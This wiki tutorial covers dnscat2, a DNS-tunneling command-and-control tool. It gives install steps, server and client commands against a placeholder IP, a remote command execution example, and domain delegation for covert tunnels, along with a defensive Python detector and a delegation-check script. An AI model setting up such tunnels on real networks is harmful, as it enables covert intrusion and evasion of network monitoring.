From charlesreid1

=Overview=
==What is it?==
dnscat2 is a tool for smuggling connections into secure networks by hiding the connection in DNS queries. Outbound DNS is usually allowed even where every other protocol is blocked, so a dnscat2 client on an internal host encodes its data into the names it looks up, and a dnscat2 server, reached either directly or as the authoritative nameserver for a domain, sends data back in the answers (TXT, CNAME and MX records by default; A and AAAA are options). Over the resulting session the operator of the server gets a command session on the client host.
There are two ways of running dnscat2:
* In "direct DNS" mode, the client sends its DNS queries straight to the dnscat2 server's IP address on UDP port 53, as if the server were an ordinary DNS server. This is the simplest setup, but a network that only lets hosts talk to its own allow-listed resolvers blocks it outright.
* In "proxy DNS" mode, the client never talks to the dnscat2 server directly: it looks up names under a domain you control through whatever resolver the network provides, and that resolver recurses to the authoritative nameserver for the domain, which is the dnscat2 server. This needs a registered domain delegated to the dnscat2 host (see DNS Setup below), but it works through resolvers that proxy, log or inspect DNS, as long as they still forward unknown names upward.
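To make the two sides of the tunnel concrete, here is an added example in Python; it is not dnscat2's own code. It encodes a byte string into DNS query names with the same hex-in-labels shape that dnscat2 queries have (dnscat2's real packet format, session handling and encryption are not reproduced), which shows how few bytes a single query can carry under a given domain, and then runs a detector over a constructed resolver log that flags the domain receiving those queries while leaving ordinary lookups alone. The log line format, the tunnel domain <code>example.com</code>, the thresholds and the two-label notion of a "registered domain" are assumptions made for the example.

```python
"""Added example (not dnscat2 code): the hex-in-labels name shape a DNS tunnel
uses, and a detector that flags it in resolver logs. dnscat2's real packet
format, sessions and encryption are not reproduced here."""
import hashlib
import math
from collections import Counter, defaultdict

MAX_LABEL = 63   # RFC 1035: a label is at most 63 octets
MAX_NAME = 253   # RFC 1035: a textual name is at most 253 characters


def bytes_per_name(domain: str) -> int:
    """Largest payload size whose hex labels plus '.domain' fit in one name."""
    budget = MAX_NAME - len("." + domain)
    n = budget // 2
    while n > 0:
        hex_len = 2 * n
        dots = (hex_len - 1) // MAX_LABEL   # separators between 63-char labels
        if hex_len + dots <= budget:
            return n
        n -= 1
    return 0


def encode_query_names(payload: bytes, domain: str) -> list:
    """Client side: chunk payload into hex labels under domain, one name per query."""
    n = bytes_per_name(domain)
    if n == 0:
        raise ValueError("domain leaves no room for payload")
    names = []
    for i in range(0, len(payload), n):
        hx = payload[i:i + n].hex()
        labels = [hx[j:j + MAX_LABEL] for j in range(0, len(hx), MAX_LABEL)]
        names.append(".".join(labels + [domain]))
    return names


def decode_query_name(name: str, domain: str) -> bytes:
    """Server side: strip the domain, drop the label dots, un-hex."""
    suffix = "." + domain
    if not name.endswith(suffix):
        raise ValueError("query is not under the tunnel domain")
    return bytes.fromhex(name[:-len(suffix)].replace(".", ""))


def shannon_entropy(text: str) -> float:
    """Bits per character; hex-encoded data sits near 4, hostnames far lower."""
    if not text:
        return 0.0
    counts = Counter(text)
    return -sum(c / len(text) * math.log2(c / len(text)) for c in counts.values())


def parse_log_line(line: str):
    """Constructed log format for this example: '<client_ip> <qtype> <qname>'."""
    client, qtype, qname = line.split()
    return client, qtype, qname.rstrip(".").lower()


def registered_domain(qname: str) -> str:
    # Last two labels; a production detector should use the public suffix list.
    return ".".join(qname.split(".")[-2:])


def find_tunnel_suspects(log_lines, min_names=5, entropy_threshold=3.5, label_threshold=40):
    """Group queries by registered domain and flag domains whose subdomains look
    like encoded data: many distinct names, very long labels, high entropy."""
    per_domain = defaultdict(list)
    for line in log_lines:
        client, qtype, qname = parse_log_line(line)
        per_domain[registered_domain(qname)].append((client, qtype, qname))
    suspects = {}
    for domain, queries in per_domain.items():
        names = {q[2] for q in queries}
        subs = [n[:-len(domain) - 1] for n in names if len(n) > len(domain)]
        if len(names) < min_names or not subs:
            continue
        max_label = max(len(lbl) for s in subs for lbl in s.split("."))
        avg_entropy = sum(shannon_entropy(s.replace(".", "")) for s in subs) / len(subs)
        if avg_entropy >= entropy_threshold or max_label >= label_threshold:
            suspects[domain] = {
                "unique_names": len(names),
                "max_label_len": max_label,
                "avg_entropy": round(avg_entropy, 2),
                "qtypes": dict(Counter(q[1] for q in queries)),
                "clients": sorted({q[0] for q in queries}),
            }
    return suspects


# Constructed sample traffic: ordinary lookups from a few hosts, plus one host
# pushing a deterministic pseudo-random 512-byte blob through a tunnel under
# example.com (the tunnel domain is an assumption for the example).
TUNNEL_DOMAIN = "example.com"
BLOB = b"".join(hashlib.sha256(bytes([i])).digest() for i in range(16))
TUNNEL_NAMES = encode_query_names(BLOB, TUNNEL_DOMAIN)
SAMPLE_LOG = [
    "10.0.0.5 A www.example.org",
    "10.0.0.5 A mail.example.org",
    "10.0.0.7 AAAA www.example.org",
    "10.0.0.9 A cdn.example.org",
    "10.0.0.7 A updates.example.org",
    "10.0.0.9 MX example.org",
] + [f"10.0.0.12 TXT {name}" for name in TUNNEL_NAMES]

if __name__ == "__main__":
    print(f"{bytes_per_name(TUNNEL_DOMAIN)} payload bytes fit in one query under {TUNNEL_DOMAIN}")
    for dom, info in find_tunnel_suspects(SAMPLE_LOG).items():
        print(f"suspect tunnel domain {dom}: {info}")
```

Under <code>example.com</code> a single maximal query carries 119 payload bytes and needs four labels, so even a small transfer produces a burst of long, high-entropy names toward one domain; that burst, not any single query, is what the detector keys on. Ordinary busy domains (the <code>example.org</code> lookups above) pass because their labels are short dictionary words. In real resolver logs also watch the query types: dnscat2 defaults to TXT, CNAME and MX, which are rare for client-originated traffic.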
==Installing==
 
The server is a Ruby program under <code>server/</code>; the client is a separate C program under <code>client/</code> and has to be compiled with <code>make</code>, which produces the <code>dnscat</code> binary used in the client examples below:
 
<pre>
# apt-get update
# apt-get -y install ruby-dev git make g++
# gem install bundler
# git clone https://github.com/iagox86/dnscat2.git
# cd dnscat2/server
# bundle install
# cd ../client
# make
</pre>
 
 
=Usage=
 
 
==Direct DNS Mode==
 
===Running the server===
 
When you run the server with no arguments it binds UDP port 53 on every interface (which is why the prompts below are root) and answers only queries aimed directly at it. Sessions are encrypted by default but not authenticated, so for anything beyond a lab start both ends with the same <code>--secret</code> value; without it an on-path attacker can interpose itself between client and server.
 
<pre>
# ruby ./dnscat2.rb
Starting Dnscat2 DNS server on 0.0.0.0:53 [domains = n/a]...
No domains were selected, which means this server will only respond to direct queries (using --host and --port on the client)
</pre>
 
Now, you can run the client and point to the host running the dnscat2 server. You should see a new session show up on the dnscat2 server side:
 
<pre>
# ruby ./dnscat2.rb
Starting Dnscat2 DNS server on 0.0.0.0:53 [domains = n/a]...
No domains were selected, which means this server will only respond to direct queries (using --host and --port on the client)
dnscat2> New session established: 12199
dnscat2>
</pre>
 
Now, you can connect to the particular interactive session with that number:
 
<pre>
dnscat2> session -i 12199
Welcome to a command session!
Use 'help' for a list of commands or ^z for the main menu
dnscat [command: 12199]> exec calc.exe
Sent request to execute
dnscat [command: 12199]>
</pre>
 
===Running the client===
 
On Linux, run the compiled <code>dnscat</code> binary from the <code>client</code> directory (not the server script) and point it at the server's IP address; <code>203.0.113.10</code> is a placeholder from the documentation address range. Depending on the client version the address is given as <code>--host</code>, which is what the server banner refers to, or as <code>--dns server=203.0.113.10,port=53</code>:
 
<pre>
./dnscat --host 203.0.113.10
</pre>
 
On Windows, using the prebuilt client binary:
 
<pre>
C:\Users\asdf\Desktop> dnscat2-win32.exe --host 203.0.113.10
</pre>
 
 
 
 
==Proxy DNS Mode==
 
 
===DNS Setup===
 
For proxy mode you need a registered domain whose authoritative nameserver is the host running the dnscat2 server, and that host must be reachable from the internet on UDP port 53. If you do not want to hand the whole domain to dnscat2, delegate a subdomain instead (an NS record for the subdomain pointing at the same nameserver names) and start both ends with that subdomain.
 
Here's how to set up the whole-domain case:
 
* Suppose you are using example.com as the domain
 
* Add two A records (registrars call these host or glue records) for the nameserver names, both pointing at the dnscat2 server's public IP address:
** <code>ns1.example.com</code>
** <code>ns2.example.com</code>
 
* Now you should inform the domain registrar that the authoritative DNS server for this domain is the dnscat2 server
** Set up the domain to use your own, custom nameservers
** Add the nameservers ns1.example.com and ns2.example.com
 
Changes made at the registrar take time to propagate, so confirm that the public DNS tree already returns your nameservers before testing the tunnel.
 
Now when you run dnscat2, pass example.com instead of an IP address on both ends: on the server, give example.com as the domain argument instead of running it with no arguments (the banner then lists the domain instead of <code>n/a</code>), and on the client, give example.com as the domain argument instead of the <code>--host</code> flag, so the client looks up names under example.com through whatever resolver the network provides.
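A delegation check to run before starting proxy mode, added here as an example and not part of dnscat2. It assumes <code>dig</code> is installed and takes the domain and the dnscat2 server's public IP address as arguments: it confirms that the NS records the public DNS tree returns for the domain all resolve to that address, then sends one TXT query straight to the server. The probe name is not a valid dnscat2 packet, so the last step only shows that something on UDP 53 at that address responds for the domain; <code>./dnscat --ping example.com</code> from a client is the end-to-end test once this passes.

```bash
#!/bin/sh
# Added example (not part of dnscat2): confirm that a domain is delegated to
# the host running the dnscat2 server before starting proxy-mode tunnels.
# Usage: check_delegation <domain> <dnscat2-server-ip>
check_delegation() {
    domain="$1"
    expected_ip="$2"
    if [ -z "$domain" ] || [ -z "$expected_ip" ]; then
        echo "usage: check_delegation <domain> <dnscat2-server-ip>" >&2
        return 2
    fi

    # Step 1: which nameservers does the public DNS tree return for the domain?
    ns_list=$(dig +short NS "$domain." 2>/dev/null)
    if [ -z "$ns_list" ]; then
        echo "FAIL: no NS records returned for $domain (delegation not live yet?)" >&2
        return 1
    fi

    # Step 2: every NS name must resolve to the dnscat2 server's address.
    rc=0
    for ns in $ns_list; do
        addrs=$(dig +short A "$ns" 2>/dev/null)
        if printf '%s\n' "$addrs" | grep -qx "$expected_ip"; then
            echo "ok   $ns -> $expected_ip"
        else
            echo "FAIL $ns -> ${addrs:-<no A record>} (expected $expected_ip)" >&2
            rc=1
        fi
    done

    # Step 3: ask the server directly, bypassing any resolver cache, so that a
    # stale cached answer cannot hide a host that is not actually listening.
    if dig +short +time=3 +tries=1 TXT "probe.$domain." @"$expected_ip" >/dev/null 2>&1; then
        echo "ok   $expected_ip responds on UDP 53 for names under $domain"
    else
        echo "FAIL $expected_ip did not respond to a TXT query under $domain" >&2
        rc=1
    fi
    return $rc
}

# Run directly: ./check_delegation.sh example.com 203.0.113.10 (placeholder address)
if [ "$#" -eq 2 ]; then
    check_delegation "$1" "$2"
fi
```

The exit status is 0 only when all three steps pass, so the function can gate a deployment script; a non-zero result with a "no NS records" message usually just means the registrar change has not propagated yet.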
 
=Resources=
 
https://web.archive.org/web/20160311081612/https://www.doctorchaos.com/dnscat2-dns-reverse-tunneling-thru-secure-networks/
 
https://zeltser.com/c2-dns-tunneling/
 
Github: https://github.com/iagox86/dnscat2
=Flags=


{{KaliFlag}}

Latest revision as of 14:29, 7 March 2022